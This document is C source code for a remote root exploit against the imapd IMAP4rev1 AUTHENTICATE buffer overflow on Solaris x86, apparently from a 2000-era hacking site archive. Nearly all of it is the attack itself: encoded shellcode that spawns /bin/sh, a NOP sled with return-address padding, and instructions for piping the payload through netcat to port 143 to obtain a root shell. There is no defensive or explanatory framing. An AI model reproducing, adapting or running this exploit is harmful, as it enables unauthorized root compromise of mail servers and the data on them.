home *** CD-ROM | disk | FTP | other *** search
- /*
- imapd IMAP4rev1 v10.205 remote root exploit, solaris x86 (not SPARC yet)
- exploits the AUTHENTICATE overflow, yielding a remote root shell
-
- shellcode is obviously modified to avoid problems with toupper()
- by anathema <anathema@hack.co.za>
- */
- /*
- Compilation:
- $ gcc imapd.c -o imapd
- Requires netcat for usage:
- $ (./imapd [offset]; cat) | nc host 143
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- #define RET 1028
- #define ADDR 0x08047148
-
- char c0de[] =
- /* main: */
- "\xeb\x33" /* jmp callz */
- /* start: */
- "\x5e" /* popl %esi */
- "\x8d\x06" /* leal (%esi), %eax */
- "\x29\xc9" /* subl %ecx, %ecx */
- "\x89\xf3" /* movl %esi, %ebx */
- "\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */
- "\xb1\x07" /* movb $0x07, %cl */
- /* loopz: */
- /*
- Go through a loop, incrementing the `/bin/sh -= 0x20` string
- by 0x20, yielding /bin/sh for execve(). Why do other exploits
- increment each char individually? Using the loop instruction is
- far more efficient.. -a
- */
- "\x80\x03\x20" /* addb $0x20, (%ebx) */
- "\x43" /* incl %ebx */
- "\xe0\xfa" /* loopne loopz */
- "\x93" /* xchgl %eax, %ebx */
- "\x29\xc0" /* subl %eax, %eax */
- "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
- "\x29\xd2" /* subl %edx, %edx */
- "\x88\x56\x19" /* movb %dl, 0x19(%esi) */
- "\x89\x56\x07" /* movl %edx, 0x07(%esi) */
- "\x89\x56\x0f" /* movl %edx, 0x0f(%esi) */
- "\x89\x56\x14" /* movl %edx, 0x14(%esi) */
- "\xb0\x3b" /* movb $0x3b, %al */
- "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
- "\x89\xca" /* movl %ecx, %edx */
- "\x52" /* pushl %edx */
- "\x51" /* pushl %ecx */
- "\x53" /* pushl %ebx */
- "\x50" /* pushl %eax */
- "\xeb\x18" /* jmp lcall */
- /* callz: */
- "\xe8\xc8\xff\xff\xff" /* call start */
- "\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
- "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
- /* lcall: */
- "\x9a\x04\x04\x04\x04\x07\x04";
-
- int
- main (int argc, char **argv)
- {
- u_char buf[4096] = {0};
- u_long addr = ADDR;
- int ret = RET, i = 0, j = 0;
-
- if (argc > 1) addr += atoi(argv[1]);
- fprintf(stderr, "addr 0x%lx\n", addr);
-
- memset(buf, 0x90, ret);
- memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
- for (i = ret; i < ret + 28; i++)
- {
- buf[i+0] = (addr & 0xff);
- buf[i+1] = (addr >> 8) & 0xff;
- buf[i+2] = (addr >> 16) & 0xff;
- buf[i+3] = (addr >> 24) & 0xff;
- }
-
- printf("* AUTHENTICATE {%d}\r\n", strlen(buf));
- printf("%s\n", buf);
-
- sleep(1);
- printf("\nuname -a; id;\n");
- }
-
-
- /* www.hack.co.za [2000]*/